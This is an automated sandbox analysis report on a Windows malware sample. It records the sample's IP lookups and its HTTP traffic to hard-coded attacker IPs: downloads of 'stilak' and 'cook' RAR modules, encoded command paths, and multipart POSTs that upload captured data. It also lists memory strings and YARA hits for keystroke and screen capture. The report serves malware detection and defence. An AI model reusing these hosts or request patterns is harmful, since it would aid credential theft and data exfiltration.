Windows Analysis Report
d6YCUW421p

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

May check the online IP address of the machine

Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe	DNS query: name: myip.opendns.com

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic	HTTP traffic detected: GET /phpadmin/O5VHv_2BomBJ/FDSQ3C_2FEh/d3AB91pB2zVZZc/V8xBUftmx0M_2Bqnngedi/DpLLDhwUKQDOSSQS/nVaNzwxkqgcnJXK/SQy2RrteBXCJGPusj_/2Fou9gPbn/TEfuPZW_2FR5wp1JKvFc/BRr_2Bgc4Sh6fwKpLbg/92QNhdYG6IBsInIDDSBHis/CLBmXrf7shSlX/Qy4n9fNl/nE2maUEbSwiaPEHMkNYQxQk/D1KSQzl_2F/HXQWBGmfgthfPqv/9SK.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /phpadmin/zilwS36OC_2/FnjmOckuG_2BCm/VAdwDdj_2Fnac_2F0y6xc/deXhx0rBocPzi7tR/z8VoemZhKDJOEZ_/2FB71dJS5j3dZE2NGK/cGLO3t6yJ/yUrrIk8eZ08FZSU_2FS0/2G1FFOzId8doUQdjVtt/kPQnX57urwlFySqx1IZrAD/AgrnwQGGtXT4R/Tizv3fN7/xX9kvTCwfaZ1KZbAGWbajAo/gFAssOtH9Z/e8lp2TS1JzI4llaNY/olcdYO51/byt.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /phpadmin/TYhCb5d3/Qd3Po_2BKjelP_2F7WSwUso/7m8jnTpLRx/uExGwdKAdHoPBjWMC/elgD5kzT2sqT/T1iJBxA5UdT/uL5VED_2B8E0P8/_2FtpnrB_2FZlg9AlWg_2/BdtlwpvI_2BcVtwg/McOCY72thR3WVt5/wVoK31AOn6hDpHdQON/XBB32U4r8/fKY68F7l0jZNTMcXJ71L/odruZsWwSuNEIUWqi7s/08LTc4yWUohU0pkFp1T8P2/l2fvxomE6/r6zvT.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/AoDLtoSAe/6DutmjjyTDh_2FQIHiYd/9oUyw2I2q90tROkr2KR/CWUpolUDaN3tzGChr_2Fou/FHzHk9QUMrSRZ/edSCIB1B/azzWY7zElPFGbO93RGKzQEV/_2BFkKFxQ8/998NdOxMsC3fIYEdc/Ie4_2B_2Fdrx/UGzDt2NGXpg/BvRBjI35WivTtB/QL0X0ILari4KdxRWbrbAr/dqxmqcvrNDaF_2Bj/dg1F4yD3XCaAWKh/cjFMlT2T0Dm12MNjNP/5xwNUsaBN/B99UzFhpyEcfojrdPWgD/_2FdFku_2FhlwUSz/g.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /images/vdoa2puIgygDcKHOof7W5Nx/Sm5x_2FLro/zObUXzRQyLPWX4K31/W76pZEGagBpT/o6IGunTWfCn/lXzKVuv3SgxDcg/QnnnzAZBFXh1ukr9Caozw/wPM7sTqNdf9sx_2F/Rne6TvIOz1EJrXu/g31KyfFRkwWQ7yEqN4/zXMBf0AoC/FcsOEsPhqIXCKsCLKvy2/p_2BCCsPTnYHLO5apYZ/ZOWl4UxrQhGJIiW3n82a5o/LRy86Sxl6Pzdu/NQ1r9_2F/M2tmRTakUsCXcEs_2FmAAzP/G6Sk1Uhj8yi4/tFtBd.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=11596931742640080004178997978User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Content-Length: 56433Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /images/exH_2BV5hI6UV32xq/9iKc6ZjImWoQ/GIugApItTP6/eU0FsndbiatJlG/8sZ81QZwXTfmteOvaRx3j/YoZ9Z9WZVb88loFE/XwzEGCF_2FYd014/RsM17SCy13qQU2pAif/TMyGZBQvh/N26WrESLVWVbmtD7LEn9/Rx20gFSw1JZAg58DLOG/BJUKRsQbaNOa0owKYxus_2/BoGrwh_2BDKqm/DuvxAvK6/zywXiP_2Bz0bAUH1Ay0X5pY/Ej1B6Nr9jL/cJXSt0eQu6DGGZWaR/qgLa8p54JO9D/mFJ_2BIO/ix2MS.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=10237571242640080004192591583User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Content-Length: 385Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 30 32 33 37 35 37 31 32 34 32 36 34 30 30 38 30 30 30 34 31 39 32 35 39 31 35 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 42 43 33 2e 62 69 6e 22 0d 0a 0d 0a bd b0 f1 b6 42 83 6d 65 20 17 b7 fb 0d 60 e3 e2 8e a3 3d 4a a0 8f 53 32 cd a5 0d 3f d7 08 bf cf f4 c9 84 46 e2 bc 84 12 c0 c3 eb 2a e5 03 39 f0 51 30 6f 08 25 1f 0d 8c 35 e7 bf fd 2b a4 34 e4 a3 3f 1b a5 e0 ad 70 da d9 18 0c e9 08 df 88 03 7f 14 91 6e 2c 69 c2 3b 07 ce 1b 3c d4 9b 0b d9 d7 31 57 2d 0a cc c1 c3 8c 59 fd e9 25 83 65 d5 1a 69 75 ca 41 3a 04 b8 d7 d6 e1 b9 70 4c 46 1b 1c 38 1c a5 12 4b 46 bf e1 55 f7 c8 ef dc d0 f1 67 44 ca b3 44 9d 69 62 8b 5c 75 ec 35 e6 3c cf 38 8f be 4b 6b e5 e6 5d 26 9d f3 ce 48 68 4e b1 b8 6a 45 18 72 2f 38 c9 03 f5 51 e0 b9 01 97 cc 43 ab 9c 64 8f 0d 59 27 f3 4b 68 35 08 89 8b 40 e9 64 aa 92 d9 fc c8 62 7d b8 2c a0 d3 9b ee a8 42 c2 4d c4 68 17 66 1c 27 e3 e4 bc e3 1e 3a 89 0d 0a 2d 2d 31 30 32 33 37 35 37 31 32 34 32 36 34 30 30 38 30 30 30 34 31 39 32 35 39 31 35 38 33 2d 2d 0d 0a Data Ascii: --10237571242640080004192591583Content-Disposition: form-data; name="upload_file"; filename="7BC3.bin"Bme `=JS2?F*9Q0o%5+4?pn,i;<1W-Y%eiuA:pLF8KFUgDDib\u5<8Kk]&HhNjEr/8QCdY'Kh5@db},BMhf':--10237571242640080004192591583--
Source: global traffic	HTTP traffic detected: POST /images/fWI73R1_2Fi/dMEh0cq63rRCJy/hEJHCisV7TLXf6s5qDp3z/BCtN_2Bg1My_2Bxo/AhaNT6s6q6_2B58/OQZoTj4FY38JIpdz1z/MCQ_2Fvl2/KaObwwaShYciWGHB8igT/ebmAGB0PycjKyjC2pvQ/6aj0R0O7yrH6fMGLiN7rcC/6qFHr8cars3Gw/I8BuhPaS/BZ6BhWd8QiKaDrJK4XQp4Ag/g0wwOGo1XO/QfQATDgE2jY4Wf7L8/foVbicjFFFm0/9oroSq36Cxf/G6HPMi1wZ9ycu5/gwcS_2Bt/rdAx9WRg/N.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=8643821742640080004208529078User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Content-Length: 559Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/hn9vDo5o2pdwMOj3di2/srMWN78hgDZUaczxPO5xxx/2O_2BS3ntQAQz/HnUcb3IT/8KnpgLjtplHN_2BEPqSF8QZ/cHtm5lTJOq/oTLlrsZ_2FnSt3L1j/Pc8IkXGbvady/p2WZlb867S8/9A0MeJ_2Bf5dgM/Eq4tZ0kF_2BtpXCObDeNb/z7e3J6dr_2FplJ56/bsJlbMROD_2Bomk/PfAQY77jeEzZAgeRyz/ayGbSxTMe/2FEuvtf4avwFHn_2BWAf/pOJpt5b_2FsOQqxnM7m/jDA3Wj8oGk9rEw_2Buu3H7/S72EfErm/f.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.37Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

Source: rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000013.00000003.596263415.000001985C0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.coQ
Source: RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609045780.0000028A77C7D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net
Source: RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609045780.0000028A77C7D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.netQ8tR9QJN7lLzOLlefile://c:
Source: RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cmge
Source: RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.uxEN
Source: RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 0000002E.00000000.666357809.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.633216017.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000002.888903264.000001EF3392F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.micro/1%L
Source: powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000013.00000002.606222894.0000019843C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: powershell.exe, 00000013.00000002.608045211.0000019843E7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.677172417.0000019853CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: RuntimeBroker.exe, 0000002E.00000000.662181621.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002E.00000000.634193211.000001EF3607D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: resolver1.opendns.com

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_04AB4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

4_2_04AB4CC6

Source: global traffic	HTTP traffic detected: GET /phpadmin/O5VHv_2BomBJ/FDSQ3C_2FEh/d3AB91pB2zVZZc/V8xBUftmx0M_2Bqnngedi/DpLLDhwUKQDOSSQS/nVaNzwxkqgcnJXK/SQy2RrteBXCJGPusj_/2Fou9gPbn/TEfuPZW_2FR5wp1JKvFc/BRr_2Bgc4Sh6fwKpLbg/92QNhdYG6IBsInIDDSBHis/CLBmXrf7shSlX/Qy4n9fNl/nE2maUEbSwiaPEHMkNYQxQk/D1KSQzl_2F/HXQWBGmfgthfPqv/9SK.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /phpadmin/zilwS36OC_2/FnjmOckuG_2BCm/VAdwDdj_2Fnac_2F0y6xc/deXhx0rBocPzi7tR/z8VoemZhKDJOEZ_/2FB71dJS5j3dZE2NGK/cGLO3t6yJ/yUrrIk8eZ08FZSU_2FS0/2G1FFOzId8doUQdjVtt/kPQnX57urwlFySqx1IZrAD/AgrnwQGGtXT4R/Tizv3fN7/xX9kvTCwfaZ1KZbAGWbajAo/gFAssOtH9Z/e8lp2TS1JzI4llaNY/olcdYO51/byt.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /phpadmin/TYhCb5d3/Qd3Po_2BKjelP_2F7WSwUso/7m8jnTpLRx/uExGwdKAdHoPBjWMC/elgD5kzT2sqT/T1iJBxA5UdT/uL5VED_2B8E0P8/_2FtpnrB_2FZlg9AlWg_2/BdtlwpvI_2BcVtwg/McOCY72thR3WVt5/wVoK31AOn6hDpHdQON/XBB32U4r8/fKY68F7l0jZNTMcXJ71L/odruZsWwSuNEIUWqi7s/08LTc4yWUohU0pkFp1T8P2/l2fvxomE6/r6zvT.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.148Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/AoDLtoSAe/6DutmjjyTDh_2FQIHiYd/9oUyw2I2q90tROkr2KR/CWUpolUDaN3tzGChr_2Fou/FHzHk9QUMrSRZ/edSCIB1B/azzWY7zElPFGbO93RGKzQEV/_2BFkKFxQ8/998NdOxMsC3fIYEdc/Ie4_2B_2Fdrx/UGzDt2NGXpg/BvRBjI35WivTtB/QL0X0ILari4KdxRWbrbAr/dqxmqcvrNDaF_2Bj/dg1F4yD3XCaAWKh/cjFMlT2T0Dm12MNjNP/5xwNUsaBN/B99UzFhpyEcfojrdPWgD/_2FdFku_2FhlwUSz/g.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /images/hn9vDo5o2pdwMOj3di2/srMWN78hgDZUaczxPO5xxx/2O_2BS3ntQAQz/HnUcb3IT/8KnpgLjtplHN_2BEPqSF8QZ/cHtm5lTJOq/oTLlrsZ_2FnSt3L1j/Pc8IkXGbvady/p2WZlb867S8/9A0MeJ_2Bf5dgM/Eq4tZ0kF_2BtpXCObDeNb/z7e3J6dr_2FplJ56/bsJlbMROD_2Bomk/PfAQY77jeEzZAgeRyz/ayGbSxTMe/2FEuvtf4avwFHn_2BWAf/pOJpt5b_2FsOQqxnM7m/jDA3Wj8oGk9rEw_2Buu3H7/S72EfErm/f.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.35.138

Source: unknown

HTTP traffic detected: POST /images/vdoa2puIgygDcKHOof7W5Nx/Sm5x_2FLro/zObUXzRQyLPWX4K31/W76pZEGagBpT/o6IGunTWfCn/lXzKVuv3SgxDcg/QnnnzAZBFXh1ukr9Caozw/wPM7sTqNdf9sx_2F/Rne6TvIOz1EJrXu/g31KyfFRkwWQ7yEqN4/zXMBf0AoC/FcsOEsPhqIXCKsCLKvy2/p_2BCCsPTnYHLO5apYZ/ZOWl4UxrQhGJIiW3n82a5o/LRy86Sxl6Pzdu/NQ1r9_2F/M2tmRTakUsCXcEs_2FmAAzP/G6Sk1Uhj8yi4/tFtBd.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=11596931742640080004178997978User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 67.43.234.14Content-Length: 56433Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match	File source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
